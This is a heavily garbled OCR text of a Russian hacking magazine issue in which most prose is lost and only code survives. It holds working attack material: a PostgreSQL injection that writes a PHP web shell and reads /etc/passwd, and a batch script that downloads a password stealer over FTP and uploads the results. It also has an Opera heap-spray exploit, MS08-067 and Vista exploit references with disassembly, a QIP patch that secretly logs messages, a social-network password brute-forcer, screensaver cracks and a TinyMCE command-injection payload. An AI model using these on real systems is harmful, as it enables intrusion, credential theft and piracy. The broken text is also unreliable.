#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
$updir = 'files'; #
$maxfsize = 2048; #

4
: sql PostgreSQL
:
,
MySQL MSSQL, PostgreSQL.
. ,
. , , , PostgreSQL
, , , , , . :
1. - ( x 01 /121/ 09

$sleep = 5; # ( 5)
$abort = 180; #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#

, , .
, , :).
, www.virustotal.com
,
. , ,
ChaaK
.

,
).
2.
(
load_file()
MySQL).

PostgreSQL
.
- - PostgreSQL, :
1. (, table_file).
2. - (,
<? passthru($_GET[cmd]); ?>).
3. (-) , -.

041

>>
:
CREATE TABLE table_shell(column_shell TEXT NOT NULL);
INSERT INTO column_shell VALUES('<? passthru($_
GET[cmd]); ?>');
COPY table_shell (column_shell) TO '/var/www/html/
shell.php';

4. :
COPY (SELECT '<?php system($_GET[cmd]); ?>') TO 'FILE_
NAME'

, -, .
1. ( load_file()
MySQL):

CREATE TABLE table_file(column_file TEXT NOT NULL);


COPY table_file (column_file) FROM '/etc/passwd';
SELECT * FROM table_file;

2. n m :
pg_read_file('bla.txt',n,m)

( n m )
3. :
pg_ls_dir('/tmp')

4. :
pg_stat_file('users.txt')

, . :).

5
: PE-
API-,
DLL
:
IID King 2.0,
PE-
.
1. wasm.ru DVD IID King.
2. , ,
, Pick
a file.
3. dll, ,
Click to pick DLL(s) and their API(s) to add.
4. , API-,
Add Them!.
5. API

Add Them!, Backup


( bak-
). !
, DLL.

6
: exe-
:
, . , ,
? ,
,
ExeScript, .bat-,
.vbs- .js- -.
:
1. DVD.
2. .
3.
( vbs/js-).
4. .
5. exe.
,
,
-. :

042

exe

@echo off
Echo open xxx.xxx.
xxx.xxx>go.txt&&echo
ftpuser>>go.txt&&echo
12345>>go.txt&&echo
get passexport.
exe>>go.txt&&echo
bye>>go.txt
Echo open xxx.xxx.xxx.
xxx>send.txt&&echo
ftpuser>>send.txt&&echo
12345>>send.txt&&echo
send pass.txt>>send.
txt&&echo bye>>send.txt

ftp -s:go.txt > nul


passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat

, , ?
,
.
x 01 /121/ 09

>>

: HTTP-
SMTP-
:

HoSproxy HTTP over SMTP Proxy.
: HoStunnel
HoSproxy.
Windows. HoStunnel
,
25 (TCP SMTP).
:
(
), .

HTTP-
.
HoSproxy ,
Hostunnel
HTTP-proxy (tcp 8080),
. HTTP-
. , :
1. HoSproxy edge-security.com/hosproxy.php (
DVD).
2. Hospoxy.cfg :
# SMTP- :
#smtp.myserver.com
local_smtp_server=
# (Y/N)
smtp-auth=N
smtp-user=cdelojo@edge-security.com
smtp-pass=
#
(pop, imap, #imapssl, popssl)

mail_retrieve_protocol=pop
#
#pop3.myserver.com
mail_access_server=
#
mas_user=cdelojo@edge-security.com
#
mas_passwd=
#, WEB-
email=cdelojo@edge-security.com
# HTTP-
ext_email=asdf@ligual.net

3. hosproxy.exe .
RNMAP

:

:
, - . , , ,
. , (
, host-based ips .). ,
Rnmap.
1. NMAP (rnmap.sourceforge.net).
2. rnmapadduser.py vasia.
3.
telnet Grnmap.py .
Nessus.
- (t1shopper.com/tools/portscanner). , , .
,
NMAP, . z
x 01 /121/ 09

043

>>

Windows ,
, , .
RPC DCOM,
MSBlast. , , ,
Gimmiv! KernelBot.dg, . !

01

MS Windows

>> Brief
2008 Thomas Unterleitner
phion AG (Marius Wachtler,
Michael Burgbacher, Carson Hounshell Michael Craggs)
TCP/IP- .
Microsoft VISTA TCP/IP stack buffer overflow,

. , TCP/
IP- .
, ExAllocatePoolWithTag,
32 ( API-
CreateIpForwardEntry2, iphlpapi.
dll, 32, 64
Windows Vista). MSDN,
MIB_IPFORWARD_ROW2, PrefixLength

32 ( ). , PrefixLength
DWORD, memcpy. .
, shell-.
CreateIpForwardEntry2 ,
, , , , (
, ). 64
Windows ,
.
, Service Pack 1! 64 XP
, MIB_IPFORWARD_ROW2.
PrefixLength ,
!
Server 2003. ,

, ... ,
,
.

,

,

044

,
. , .
securityfocus.com/archive/1/498471.
.
>> Targets
Vista Home/Business/Enterprise/Ultimate x32/x64 SP0/SP1
>> Exploit
exploit, , Thomasa
Unterleitnera securityfocus.com/data/vulnerabilities/
exploits/32357.c. .
IP- !
- .
IP- .

exploit,

MIB_IPFORWARD_ROW2 route;
route.InterfaceIndex = atoi(argv[1]);
route.DestinationPrefix.PrefixLength = atoi(argv[2]);
route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr =

inet_addr('1.2.3.0');
route.NextHop.Ipv4.sin_addr.s_addr =

inet_addr("11.22.33.44");
route.Protocol = MIB_IPPROTO_NETMGMT;
route.Origin = NlroManual;
route.ValidLifetime = 0xffffffff;
route.PreferredLifetime = 0xffffffff;
route.Metric = 1;
CreateIpForwardEntry2(&route);

>> Solution
Microsoft , ,
. , ,
, .
.

02

MS Windows

>> Brief
, ,
support#killprog.com.
x 01 /121/ 09

>>
API- UnhookWindowsHookEx ( )
( API-
SwitchDesktop) win32k.sys, . , API-
!
. ,
( ) .
, .
exploit, support#killprog, ,
API-
Sleep(0)
. exploit
. ,
(, ) . exploit
, Windows
. murphy-law.
net.ru securityfocus.com/bid/32206.

>> Targets:
Server 2003 Standard/Enterprise/Datacenter x32/
x64 Vista Home/Premium/Ultimate x32/x64. , , .
>> Exploit
exploit, ,
securityfocus.com/data/vulnerabilities/exploits/whk.zip
Microsoft Visual C++ exe/dll
( ).

>> Solution
! , Microsoft
, . , ,
( , ). ,
.
Server 2003 USER32.
DLL , UnhookWindowsHookEx
SwitchDesktop
.

03

Opera

>> Brief
, , . (
), ,
shell-.
2008

( ~16,500 ) URL file. Security
Focus ( securityfocus.com/bid/32323)
,
HTML- exploit. , , offline,
. ,
, . ,
:).
x 01 /121/ 09

>> Targets
9.6 9.62.
>> Exploit
exploit, ,
milw0rm.com/exploits/7135, .
exploit,
<script>
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape(%ue8fc%u4100);
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "file://";
for(var i = 0; i<16438; i++) evil += "X";
evil += "R."; window.location.replace(evil);
</script>

>> Solution
, , .
, .

04

MS Windows

RPC

>> Brief
2 2008 (
) 20
.
, RPC. Windows 2000 /Server 2008
. 32,
64, . Trojan-Spy:W32/Gimmiv.A/B/C, W32/Conficker.worm, Trojan:
Win32/Wecorl.A/B, Trojan:Win32/ Clort.A/!exploit/dr, TrojanDownloader:
Win32/VB.CQ/CJ ,
, .
exploit ,
,
.
Microsoft , , ( ),
! Microsoft
, (
, ).
, .
, : microsoft.com/technet/security/Bulletin/ms08-067.mspx securityfocus.
com/bid/31874, http://blogs.technet.com/swi/ blogs.msdn.com/sdl/
archive/2008/10/22/ms08-067.aspx.
exploit

>> Targets

NT- : W2K
Professional/ Server/Advanced/
Datacenter SP0/SP1/SP2/SP3/
SP4, XP Gold/Home/Professional
SP0/SP1/ SP2/SP3 x86/x86-64, Vista

045

>>
Home/Business/ Enterprise/ Ultimate SP0/SP1 x86/x86-64, S2K3 Standard/
Datacenter/Advanced/Enterprise SP0/SP1/SP2 x86/x86-64/ Itanium, S2K8
Standard/Datacenter/Advanced/Enterprise SP0 x86/x86-64/ Itanium.

>> Exploits
exploit , ... , ,
,
(W2K, XP, S2K3).
S2K8 exploit , ,
! ,
:
1. MS08-067 Remote Stack Overflow Vulnerability Exploit by Polymorphours
W2K, , : milw0rm.com/
exploits/7104.
2. MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) W2K
S2K3[SP2], , : milw0rm.com/
exploits/7132.
3. MS08-067 Exploit for CN by EMM@ph4nt0m.org , XP, S2k3 . ,
exploit, : milw0rm.com/sploits/2008MS08-067.rar.
4. MS08-067 Gimmiv Worm.A ( ): offensivecomputing.net/
?q=ocsearch&ocq=d65df633dc2700d521ae4dff8c393bff
>> Solution
Microsoft , , (
microsoft.com/technet/security/Bulletin/ms08-067.mspx)
,
. 139 445
, . - ,
, 5c
00 2e 00 2e 00 5c 00 (\..\), 2f 00 2e 00 2e 00 2f 00 (/..), 5c 00 2e 00 2e
00 2f 00 (\../) 5c 00 2e 00 2e 00 2f 00 (/..\).
(kpnc.org/ftp/MS08067.zip, 123456). RPC
SRVSVC ,
( ).
,
.
>> Disclose
,
/exploit.
,
, , ? ? , ,
exploit .
, Microsoft,
. , - RPC ,
, ! ,
. Microsoft ,
, .
,
, W2K S2k8.
, W2K, Windows2000KB958644x86RUS.EXE,
CAB-. ? exe HIEW, MSCF.
.cab, Windows compress.exe RAR, netapi32.

046

Gimmiv.A,
I_NetPathCanonicalize,
\..\
dll, . : XP
, exe , ,
. ,
.
IDA-Pro BinDiff PatchDiff,
, : http://cgi.tenablesecurity.com/tenable/
patchdiff.php.
netapi32.dll netapi32_o.dll,
IDA-Pro .
, netapi32.dll ( netapi32_p.dll), ,
Edit\Plug-ins, PatchDiff netapi32_o.idb.
, PatchDiff ,
21 .
,
( Graph). , I_NetPathCanonicalize
( ).
.
1.
Jump to Code .
netapi32.dll
7CD1AA3E
push
0
; char
7CD1AA40
lea
eax, [ebp+UncServerName]
7CD1AA46
push
eax
; Dest
7CD1AA47
lea
eax, [ebp+var_20]
7CD1AA4A
push
eax
; int
7CD1AA4B
push
[ebp+Buffer]
; Buffer
7CD1AA4E
NetpIsRemote
netapi32.dll
7CD1FB7D
push
7CD1FB7F
push
7CD1FB84
lea

0
; char
104h
; int
eax, [ebp+UncServerName]
x 01 /121/ 09

>>

MS HIEW

7CD1FB8A
7CD1FB8B
7CD1FB8E
7CD1FB8F
7CD1FB92

push
lea
push
push
call

eax
eax, [ebp+var_20]
eax
[ebp+Buffer]
NetpIsRemote

; Dest
; int
; Buffer

!
NetpIsRemote(Buffer, int, Dest, char),
NetpIsRemote(Buffer, int, Dest, char, 0x104).
, 0x104
, . , .
NetpwPathCanonicalize(),
sub_7CD1AB28, :
,
7CD1AB53
push
[ebp+Source]
;
7CD1AB56
call
edi
;
7CD1AB5B
cmp
eax, ebx
7CD1AB5D
ja
short loc_7CD1ABCF
7CD1AB5F
push
[ebp+Source]
;
7CD1AB68
push
eax
;
7CD1AB69
call
ds:__imp_wcscat
7CD1AB8D
lea
eax, [ebp+Str]
7CD1AB93
push
eax
7CD1AB94
call
sub_7CD1ABD9
7CD1AB9D
lea
eax, [ebp+Str]
7CD1ABA3
push
eax
;
7CD1ABA4
call
edi
;
7CD1ABA6
lea
eax, [eax+eax+2]
7CD1ABB4
lea
eax, [ebp+Str]
7CD1ABBA
push
eax
;
7CD1ABBB
push
[ebp+Dest]
;
7CD1ABBE
call
ds:__imp_wcscpy

Str
__imp_wcslen

Source
Dest

Str
__imp_wcslen

Source
Dest

wcslen()/wcscpy().
bug-free ,
,
/, \ ., - \..\ :

7CD1ABD9
sub_7CD1ABD9 proc near

; CODE XREF: sub_7CD1AB28+6C^p
7CD1ABD9
7CD1ABE0
mov
edi, [esp+14h+arg_0]
'/'
7CD1ABE4
push
7CD1ABE6
pop
esi
7CD1ABE7
xor
edx, edx
7CD1ABE9
mov
ax, [edi]
'\'
7CD1ABEC
push
7CD1ABEE
pop
ebx
7CD1ABEF
xor
ebp, ebp
7CD1ABF1
cmp
ax, bx
7CD1ABF4
mov
[esp+14h+var_4], edx
7CD1ABF8
jz
loc_7CD1EB17
x 01 /121/ 09

7CD1ABFE
cmp
ax, si
7CD1AC01
jz
loc_7CD1EB17
7CD1AC07 loc_7CD1AC07:
; CODE XREF: sub_7CD1ABD9+3F51v
7CD1AC07
test
ax, ax
7CD1AC0A
mov
esi, edi
7CD1AC0C
jz
short loc_7CD1AC2B
7CD1AC0E loc_7CD1AC0E:
; CODE XREF: sub_7CD1ABD9+60vj
7CD1AC0E
cmp
ax, bx
7CD1AC11
jz
loc_7CD273A8
7CD1AC17
cmp
ax, '.'
7CD1AC1B
jz
loc_7CD273BB

, , sub_7CD1ABD9() . . exploit
SRVSVC I_NetPathCanonicalize
I_NetPathCompare. , .
,
4B324FC8-1670-01D3-12785A47BF6EE188:
I_NetPathType;
I_NetPathCompare;
I_NetNameValidate;
I_NetNameCompare;
I_NetListCanonicalize;
I_NetPathCanonicalize
I_NetNameCanonicalize;
I_NetServerSetServiceBits;
I_NetServerSetServiceBitsEx;


( )
\..\ - /../, /..\, \../ (
S2k3/S2k8).

,
. MSDN, SRVSVC
: msdn.microsoft.com/en-us/library/cc213209.
aspx. (hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.
html) . !
. ,
shell-
.
JMP ESP/CALL ESP (FFE4h/FFD4h),
netapi32.dll, .
, Windows,
.
,
. , Metaspoit.
DEP, ,
API- VirtualAlloc VirtualProtect,
( Google
return2libc).
exploit .
. ,
/ , shell-, .
DVD. z

047

>>
Cr@wler
/ crawlerhack@rambler.ru /

qip
-

, , ,
, .
,
, - QIP.

Easyhack , QIP ,
MessageBoxA. ,

, ,
, QIP
.
,
.
qip.exe ,
.
, , OllyDbg. , ,
QIP .
. , QIP ,
. ,
, : -
nop
.
, .
:).
, -
PE- ( , , )
, .
, :
068F4BA PE-

048

. , .
:
0048023F
00480242
00480246
00480248

. 8B45 FC
. 807D FB 00
74 0F
E8 B740F8FF

MOV EAX,DWORD PTR SS:[EBP-4]


CMP BYTE PTR SS:[EBP-5],0
JE SHORT qip_modi.00480257
CALL qip_modi.00404304

, -
, .
00480246 <shift+F9>.
: .
,
<shift+F9> , CALL 00404304, (
, Undo Selection).
nop <shift+F9>. <shift+F9>, , Undo
Selection, .
, ,
?
.
, . , .
, -
, , !
x 01 /121/ 09

>>

warning
,

,

.

,

, ,
.


, EBX (
, , ;
) 0064ED7C.
, , , . , 0068F857.
, 00480248,
.
00480248 jmp 0068f857

, ,
0048024D .
:

, API-:
. MSDN, .
CreateFileW.
(
, ):
hTemplateFile -,
;
Attributes ;
Mode ;
pSecurity ;
ShareMode ;
Access ;

0068F857 CMP EBX,0064ED7C ; ebx , , ,



0068F85D JNZ 0068F864 ; 0064ED7C, ...
0068F85F JMP 0048024D ; ...
( qip.exe)
0068F864 PUSH 0048024D ;
...
0068F869 JMP 00404304 ; ...

,
, !
,
: -.


, ,
. ,
x 01 /121/ 09

049

>>
FileName .

( ).
WriteFile. :
BOOL WINAPI WriteFile(
__in
HANDLE hFile,
__in
LPCVOID lpBuffer,
__in
DWORD nNumberOfBytesToWrite,
__out_opt
LPDWORD lpNumberOfBytesWritten,
__inout_opt LPOVERLAPPED lpOverlapped
);

:
hFile ;
Buffer , ;
nNumberOfBytesToRead ;
lpNumberOfBytesRead
;
lpOverlapped OVERLAPPED
().

, ,
0068F86E. . (
, , EASYHACK 2008 ),
,
, ( [ebp-8]) :
00649A01
00649A06
00649A0A

CALL qip.004678B4
CMP DWORD PTR SS:[EBP-8],0
JE SHORT 0649A2F

0068F88A

. 50

PUSH EAX ; /hObject

3. WriteFile .
, , API-:
, .
, 0068F8EB.
,
VirtualProtect NewProtect = PAGE_EXECUTE_
READWRITE. VirtualProtect
0068F8B7 (
PUSHAD). MOV
, ,
0068F8EB. :
; WriteFile :
0068F88B PUSH 0
; |/pOverlapped = NULL
0068F88D PUSH EBP
; ||pBytesWritten
0068F88E PUSH 10
; ||nBytesToWrite = 10 (16.)
0068F890 PUSH qip_modi.0068F8EB

; ||Buffer = qip_modi.0068F8EB
0068F895 PUSH EAX
; ||hFile
0068F896 CALL kernel32.WriteFile ; |\WriteFile
; CloseHandle ,
"PUSH EAX", 0068F88A:
0068F89B CALL CloseHandle
; ,
VirtualProtect :
0068F8A0 POPAD

, , CALL-, ,
( cmp je). ,
:
00649A01
00649A06
00649A0B

CALL qip_modi.004678B4
JMP 0068F86E
NOP

; qip.exe
0068F8A1 JMP qip_modi.00649A0B
; , CreateFileW:
0068F8A6 NOP
0068F8A7 UNICODE "log.txt",0


? . 0068F86E .
1. CreateFileW . API EAX .
0068F86E > 6A 00
PUSH 0 ; /hTemplateFile = NULL
0068F870 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
0068F875 . 6A 04
PUSH 4 ; |Mode = OPEN_ALWAYS
0068F877 . 6A 00
PUSH 0 ; |pSecurity = NULL
0068F879 . 6A 03
PUSH 3 ; |ShareMode = FILE_SHARE_
READ|FILE_SHARE_WRITE
0068F87B . 68 000000C0 PUSH C0000000 ; |Access =
GENERIC_READ|GENERIC_WRITE
0068F880 . 68 A7F86800 PUSH qip_modi.0068F8A7
;
|FileName = "log.txt"
0068F885 . E8 D60E187C CALL kernel32.CreateFileW ;
\CreateFileW

2. EAX
CloseHandle,
.

; :
0068F8B7 PUSHAD
; VirtualProtect
:
0068F8B8

0068F8BD

0068F8BF

0068F8C4

0068F8C9

PUSH 32F7D0
; /pOldProtect = 0032F7D0
PUSH 40
; |NewProtect = PAGE_EXECUTE_READWRITE
PUSH 0FF
; |Size = FF (255.)
PUSH qip_modi.0068F8EB
; |Address = qip_modi.0068F8DD
CALL kernel32.VirtualProtect
; \VirtualProtect

;
, 0068F8EB:
; 4 ...:

050

x 01 /121/ 09

>>

QIP . :)

0068F8CE
0068F8D2
0068F8D4
0068F8D9

MOV
MOV
MOV
MOV

ECX,DWORD PTR DS:[EBP-8]


EDX,DWORD PTR DS:[ECX]
ECX,qip_modi.0068F8EB
DWORD PTR DS:[ECX],EDX

;... 4 :
0068F8DB
0068F8DF
0068F8E2
0068F8E7

MOV
MOV
MOV
MOV

ECX,DWORD PTR DS:[EBP-8]


EDX,DWORD PTR DS:[ECX+4]
ECX,qip_modi.0068F8EF
DWORD PTR DS:[ECX],EDX

;
, -:
0068F8E9 JMP SHORT qip_modi.0068F86E

.
:
00649A06 JMP 0068F86E

, VirtualProtect, .
0068F8E9 :

! , .

VirtualProtect ,
.
WriteFile, , . ,
. , ,
.

, !
, -, . -,
, , . -,
. ,
. ,
,
QIP, - . :
-,
QIP, ,
.
(, ) . ,
.

. ! z

00649A06 JMP 0068F8B7


x 01 /121/ 09

051

>>
Balashek

BBS, , . , , .
.
. . , , .
, ?

. - . , .
,

, .
: -
? ?
.
, , . !

052


?
,
.
, , ,
. :
1. ( ,
: ,
, , , / ).
, . .
2. (
,
x 01 /121/ 09

>>
). ,
.
.
3. ( , , ,
).
4. (,
, ). .
, ,
. ,
( ) . . .

///
, www.
vkontakte.ru www.odnoklassniki.ru, -.
/// . (
),
. , , , .
- Chaaka
Vkontakte PM spamer. ,
:).
:




, [name]
[lastname]



Ajax


, - 777
:
[name] .
[lastname] .


[:] (
,
, 1 ).
cURL , . ,
:). ,
Vkontakte.ru TOOLs Smapt.

. - :
1 / 70 50 . , vkontakte.ru bruteforce with multi-threads
C!klodoL. :
1. ActivePerl .
2. :
$dic = 'passl.txt'; #
$id = 111111; #id
$mail = 'mail%40mail.com'; #, @
%40
$threads = 4; #

info
/
,



.

.

!

3. .

x 01 /121/ 09

053

>>

IP DDoS
Vkontakte Tools

: http://vkontakte.ru/opinions.
php?id=. , !
,
, , , :
http://vkontakte.ru/infested_ip_list.html.
IP-, 100% ( ) DDoS vkontakte.ru. The List
of 17029 Infested IP Addresses:

:)

warning
!

!
,

!

054

4. good.txt
. .
Odnaklassniki
cheker Vid0k, PHP.
, (
DVD).
, , (,
,
,
-). ,

.
&#175;
( ). ,
, &#175;
.

.
&#8238; ( ).

:
1. ID .
. http://vkontakte.
ru/friend.php?id=. id= ID
.
2. :
: http://vkontakte.ru/photos.
php?act=user&id=.
: http://vkontakte.ru/photos.php?id=.
: http://vkontakte.ru/video.php?id=.
: http://vkontakte.ru/notes.php?id=.

121.0.133.32
121.0.134.65
121.0.134.70
121.0.135.1
121.0.135.124
121.0.135.14
121.0.135.34
12.107.192.164
121.100.111.216
121.100.96.91
121.11.132.44
121.11.174.93
121.11.182.39
121.11.183.185
121.11.185.147
121.124.193.6
121.125.101.160
121.125.205.51
121.125.241.60

, , IP :). :
http://vkontakte.ru/test.html
http://vkontakte.ru/admin.html
http://vkontakte.ru/captcha.php
http://vkontakte.ru/index.php?=PHPB8B5F2A03C92-11d3A3A9-4C7B08C10000

,
,
:).


. z
x 01 /121/ 09

>>
_A1!3N


, . ,
, , ,
-
.
.
,
( ,
).
Win-
z, !. , 3D- . -
3D- , Win-. 3D
, Windows ( ,
) WinApi
. , SendMessage .
3D 3D-, ,
, .
, ,
,
.
, ( , - ..). -

056

, .
, . , , MD5, RSA ,
( ) .
,
. ( , ) . , ,
. user mode (OllyDbg, MS Dbg)
3D-.


, .
3D-, 3D-,
, (OpenGL),
(OpenGL)
. : x 01 /121/ 09

>>

_A1!3N

, ( ,
, ,
, , , ) . , :
1. API-,
(glOrtho);
2. API-,
(glEnable(GL_BLEND), glBlendFunc(GL_SRC_ALPHA, GL_ONE_
MINUS_SRC_ALPHA), glColor4f...);
3. .

, .
, -
Screensaver download !
:). , Windows
, System32, *.scr ,
... !

OpenGL
ElectriCalm 3D Screensaver.
IDA ( , ,
, ). . x 01 /121/ 09

PE Executable (*.scr *.exe). ,


, Imports.
gl_ , OpenGL.
glOrtho.
DATA XREF: ,
glOrtho. .
.data:0043A2CC glOrtho

dd ? ; DATA XREF: sub_405350+44

, ( IDA sub_
405350) 0x405350. ? glOrtho,
, N Rename
Call_Ortho.
CODE XREF: , ,
, , Call_Ortho.
; CODE XREF: sub_403C10+E02
; sub_405110+2A

(sub_403C10+E02) :
004049DC
004049E1

push
call

0BE2h
glEnable

;.
;glEnable(GL_BLEND);

057

>>

Hiew

OpenGL-

004049E7
push
303h
004049EC
push
302h ;. . ( )
004049F1
call
glBlendFunc ;glBlendFunc(GL_SRC_
ALPHA, GL_ONE_MINUS_SRC_ALPHA);
004049F7
mov
ebx, [ebp-34h]
004049FA
push
ebx
; ( )
004049FB
push
0
004049FD
push
0
004049FF
push
0
;.
. ALPHA
00404A01
call
glColor4f ;glColor4f(RED,GREEN,BLUE
,ALPHA)
00404A07
push
0DE1h
;.
00404A0C
call
glDisable ;glDisable(GL_TEXTURE_2D)
00404A12
call
Call_Ortho ;glOrtho... . .

00404A17
push
7
;
00404A19
call
glBegin
;glBegin(GL_QUADS)

,
. , ,
,
. (glDisable(GL_TEXTURE_2D))

, .
push 7 0x00404A17 push 0,
glBegin(GL_POINTS). OpenGL
, . glBegin
.
OpenGL, .
OllyDbg, Hiew. Hiew ElectriCalm 3D Screensaver.scr
<Enter> , .
<F5> 0x00404A17,
, ,
PE-, . <Enter>.
(6A 07) -
push 7. <F3>, 6A 00.
<F9> .
(, , OpenGL ,
), - . ,

058

! , ,
-.
sub_405110 (
PrintStringLine), , .
, Call_Ortho,
, ,
. (
, , , , ..).

. . , (
NOP 0x90,
push...) - (glBegin,
glVertex). glVertex3f
x, y, z. (, 0),
3D-: . :
glColor4f -,
0.0 1.0 :
004049F7 mov ebx, [ebp-34h] ; [ebp-34h] EBX

004049F7 xor ebx, ebx ;


EBX (EBX = 0) = 0

NOP. - , -.
ASSEMBLER, OllyDbg.
:
1. OllyDbg, ElectriCalm 3D Screensaver.scr.
2. <Ctr+G>
004049F7.
3. , xor ebx, ebx.
(OllyDbg NOP ).
4. Copy to executable
All modifications.
5. Copy all.
6. Save file c .
3D Formula 1 Screensaver.
. glOrtho,
, CallOrtho ,
. Color4f Vertex3f. ,
. ,
. :
, ,
. , OpenGL,
x 01 /121/ 09

>>

3D-

(RenderFunc
IDA) API- SwapBuffers
glutSwapBuffers, - glut, -
Windows - .
SwapBuffers, . ,
, ( ,
). SwapBuffers :
extrn SwapBuffers:dword

; DATA XREF: sub_406320+281
; sub_417379+6FC

, . :
00417A3F
test
ecx, ecx
00417A41
jnz
short loc_417A54

; <---Vot on, beyte ego
00417A43
push
offset unk_452710
00417A48
mov
edx, [ebp+arg_0]
00417A4B

push
edx
00417A4C
call
sub_4065BB
00417A51
add
esp, 8
00417A54 loc_417A54:

; CODE XREF:
RenderFunc+6C8
00417A54
call
sub_4068F0
00417A59
call
sub_405D40
00417A5E
push
1
00417A60
call
sub_405CF0
00417A65
add
esp, 4
00417A68
call
ds:glFlush
00417A6E
call
ds:wglGetCurrentDC
00417A74
push
eax
; HDC
00417A75
call
ds:SwapBuffers


, ,
.
, . ,
0x00417A41,
sub_4065BB. ,
Call_Ortho, glColor4f,
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_
ALPHA), ,
OpenGL, . sub_4065BB 75 EB.
jne 000417a54 (7511) 7511
EB11. (
x 01 /121/ 09

ECX) Jmp. , ,
.

DirectX
, , DirectX
COM. ,
,
.
. , COM
. ,
DirecX,

.
, OpenGL-,
. ,
. RenderFunc?
, 3- .
( IDA
On_Idle),
.
RenderFunc,
. DirectX-: Spirit of
Fire 3D Screensaver. IDA.
, , RenderFunc.
, , API-, , PeekMessage
( , PeekMessage
RenderFunc). ,
sub_40A4A0, ,
0x0040A4A0. On_Idle.
WaitMessage Call sub_403910.
OnIdle, . ? ,
( 1...3). ,
. , , ,
, ,
Jcc :
00403C1B
00403C21
00403C27
00403C29
00403C2B
00403C31
00403C37
00403C39
00403C3B
00403C3D
00403C42

call
mov
test
jnz
mov
mov
sub
cmp
jb
call
jmp

timeGetTime
ecx, ds:dword_49A17C
ecx, ecx
short loc_403C49
edx, ds:dword_49A1A4
ecx, ds:dword_497110
eax, edx
eax, ecx
short loc_403C44
sub_401110
short loc_403C49

;(1)

;(2)

info

(,
-

,
, ,

NOP 0x90...):
1. .
Windows 95.
2. .

.
.
3. .,
., .
OpenGL.
.

059

>>

DirectX

00403C44
00403C49
00403C4E
00403C50
00403C51
00403C54
00403C5A
00403C60
00403C66
00403C68
00403C6D
00403C6F

call
mov
mov
push
call
mov
imul
mov
test
mov
jnz
mov

sub_401390
eax, ds:dword_4A0854
ecx, [eax]
eax
dword ptr [ecx+18h]
edx, ds:dword_4A085C
edx, 4CCh
eax, ds:dword_49ACD4[edx]
eax, eax
eax, ds:dword_4A0844
short loc_403C8B
;(3)
ecx, [eax]

sub_401110, 0x00403C3D, , API- (ExtTextOut, SetTextColor...),


, UNREGISTERED
VERSION!, Press the space bar to find out. ? , . sub_
401390 0x00403C44.
Remaining time: %u sec.. -,
.
, , Jnz (1)
; :
75 EB.
Atlantis 3D Screensaver.
,
( 0x0042414F). , -

060

( WinAPI) On_Idle (
0x004241B3). RenderFunc.
... :
0042839A

call

dword ptr [eax+4Ch]

? , EAX.
:
00428392
mov
edx, [ebp+var_C] ; EDX var_C=ebp-0Ch
00428395
mov
eax, [edx]
; EAX var_C, On_Idle:
004281CC
mov
[ebp+var_C], ecx ; [ebp+var_C] On_Idle
, ECX, , ..
, ECX.
004241AD
mov
ecx, [ebp+var_4C8] ; ECX

? :
00423EA4
mov
[ebp+var_4C8], ecx ; [ebp+var_4C8] sub_423E9B

ECX (sub_423E9B)
. , :
x 01 /121/ 09

>>

IDA !

0044C395
mov
ecx, offset unk_56EF30 ; ECX
unk_56EF30

! , ,
ASSEMBLER. , ECX
, this ++, ,
, ( = (this+4Ch)). , ,
, ? this=unk_56EF30
. , .
OllyDbg, , 0x0056EF30 (
, Go to Expression, 0056EF30)
0x18744900.
Intel (
), 0x00497418,
0x00497418 + 0x4C = 0x00497464, , ,
0x00454a87 . IDA:
sub_454A87 ,
, . , ,
NOP. , .
.
Call. - ,
,
. ( ),
, ! (0x00454B0C)
(0x00454B08), . -, ,
, FPS. - , .
! sub_428670 ,
3 .
. : , ,
. -
. , ,
,
, ( ).
IDA . , . ,
, , . ,
.
x 01 /121/ 09

00429712 jz

loc_429A91

, .
:
004292C3 jz

loc_429680

!
Christmas Time 3D Screensaver
.
, On_iDle RenderFunc .
. ,
, , , . IDA, On_Idle.
, 0x0041295F. , -
, . ,
On_Idle inline-, . , On_Idle , RenderFunc. RenderFunc
: Jcc 0x00413344. , ,
. 0x004132DC, 0x004132EE.
, . Jcc
0x00413282, ! , RenderFunc.
. sub_406C07 ,
, RenderFunc. sub_4091FA,
50 , ,
Bliss, Lamp_off01.tga... ,
0x0040AA18.

?
, , ( ) 3- -.
, , ( , )
, , , ASProtect.
stripper. - 3D-
, - ,
- .
: . ,
3D-. z

061

>>

/ icq 884888, http://wap-chat.ru /

PHP-

WordPress, Joomla, Drupal, Moodle , , CMS, PHP. , -: kses, Snoopy SpellChecker


TinyMCE?
,
: XSS code exec. ,
CMS.

code exec
WYSIWYG- TinyMCE.
TinyMCE , ,
, WordPress 2.0.x-2.7.x
./wp-includes/js/tinymce/plugins/spellchecker.
: Google, PHP- PSpell,
win- nix- aspell.
config.php :
<?php
$config['general.engine'] = 'GoogleSpell';
//$config['general.engine'] = 'PSpell';
//$config['general.engine'] = 'PSpellShell';
...
$config['PSpellShell.mode'] = PSPELL_FAST;
$config['PSpellShell.aspell'] = '/usr/bin/aspell';
$config['PSpellShell.tmp'] = '/tmp';
...
?>

062

, ,
TinyMCE. , $config[general.engine] = PSpellShell;
.
.
RPC- ( 3 TinyMCE 2.5 WordPress, POST
GET-).
lang

./wp-includes/js/tinymce/plugins/spellchecker/classes/
PSpellShell.php:
function _getCMD($lang) {
$this->_tmpfile = tempnam(
$this->_config['PSpellShell.tmp'], "tinyspell");
if(preg_match("#win#i", php_uname()))
return $this->_config['PSpellShell.aspell'] .
" -a --lang=". $lang . " --encoding=utf-8 -H < "
. $this->_tmpfile . " 2>&1";
x 01 /121/ 09

>>

return "cat ". $this->_tmpfile ." | " . $this->_


config['PSpellShell.aspell']
. " -a --encoding=utf-8 -H --lang=". $lang;
}

evil-
JSON-. POST-,
rpc.php, :
{"method":"getSuggestions","params":["en; _EVIL_"]}

, , :). .


, , Snoopy PHP-, .
, , .
